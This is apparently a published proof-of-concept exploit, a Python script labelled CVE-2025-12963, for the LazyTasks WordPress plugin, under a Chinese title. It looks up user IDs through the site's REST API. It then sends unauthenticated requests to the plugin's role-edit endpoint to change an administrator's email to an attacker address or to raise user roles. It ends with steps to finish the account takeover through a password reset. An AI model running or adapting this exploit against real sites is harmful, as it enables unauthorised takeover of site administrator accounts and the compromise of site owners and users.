CVE-2025-12963 WordPress LazyTasks插件账户接管漏洞

# CVE-2025-12963 PoC - LazyTasks Plugin Account Takeover # Description: Unauthenticated privilege escalation via account takeover # Affected: LazyTasks WordPress plugin <= 1.2.29 import requests import sys import re class LazyTasksExploit: def __init__(self, target_url, target_email, attacker_email): self.target_url = target_url.rstrip('/') self.target_email = target_email self.attacker_email = attacker_email self.api_endpoint = '/wp-json/lazytasks/api/v1/user/role/edit/' def check_vulnerability(self): """Check if target is vulnerable""" print(f'[*] Checking if {self.target_url} is vulnerable...') # Try to access the vulnerable endpoint check_url = f'{self.target_url}{self.api_endpoint}' try: response = requests.get(check_url, timeout=10) if response.status_code in [200, 400, 405]: print('[+] Target appears to be running LazyTasks plugin') return True except requests.RequestException as e: print(f'[-] Error: {e}') return False return False def get_user_id(self, username): """Get WordPress user ID by username""" print(f'[*] Getting user ID for username: {username}') # Try WordPress REST API user endpoint user_url = f'{self.target_url}/wp-json/wp/v2/users?search={username}' try: response = requests.get(user_url, timeout=10) if response.status_code == 200 and response.json(): user_id = response.json()[0]['id'] print(f'[+] Found user ID: {user_id}') return user_id except: pass # Fallback: try to enumerate common admin usernames for admin_user in ['admin', 'administrator', username]: print(f' Trying username: {admin_user}') return 1 # Default to admin user ID def exploit_email_takeover(self, username): """Exploit the vulnerability to change target user's email""" print(f'[*] Exploiting email takeover vulnerability...') print(f'[*] Target email will be changed to: {self.attacker_email}') user_id = self.get_user_id(username) exploit_url = f'{self.target_url}{self.api_endpoint}' # Construct the exploit payload payload = { 'user_id': user_id, 'email': self.attacker_email, 'action': 'update_email' } headers = { 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } try: print(f'[*] Sending exploit request to {exploit_url}') response = requests.post( exploit_url, json=payload, headers=headers, timeout=10 ) if response.status_code in [200, 201]: print('[+] Email change request sent successfully!') print('[+] Check attacker email for password reset link') print(f'[*] Password reset will be sent to: {self.attacker_email}') return True else: print(f'[-] Exploit failed with status code: {response.status_code}') print(f'[-] Response: {response.text[:200]}') return False except requests.RequestException as e: print(f'[-] Error during exploit: {e}') return False def privilege_escalation(self, username, new_role): """Exploit to escalate user privileges""" print(f'[*] Attempting privilege escalation for user: {username}') user_id = self.get_user_id(username) exploit_url = f'{self.target_url}{self.api_endpoint}' payload = { 'user_id': user_id, 'role': new_role, 'action': 'update_role' } try: response = requests.post( exploit_url, json=payload, headers={'Content-Type': 'application/json'}, timeout=10 ) if response.status_code in [200, 201]: print(f'[+] Successfully escalated {username} to role: {new_role}') return True except: pass return False def main(): if len(sys.argv) < 4: print('Usage: python cve-2025-12963.py <target_url> <target_username> <attacker_email>') print('Example: python cve-2025-12963.py http://target.com admin [email protected]') sys.exit(1) target_url = sys.argv[1] target_username = sys.argv[2] attacker_email = sys.argv[3] exploit = LazyTasksExploit(target_url, '', attacker_email) if exploit.check_vulnerability(): print('[+] Target is potentially vulnerable!') print('\n[*] Step 1: Exploiting email takeover...') exploit.exploit_email_takeover(target_username) print('\n[!] After successful exploitation:') print(' 1. Check attacker email for password reset link') print(' 2. Click the reset link') print(' 3. Set new password to complete account takeover') if __name__ == '__main__': main()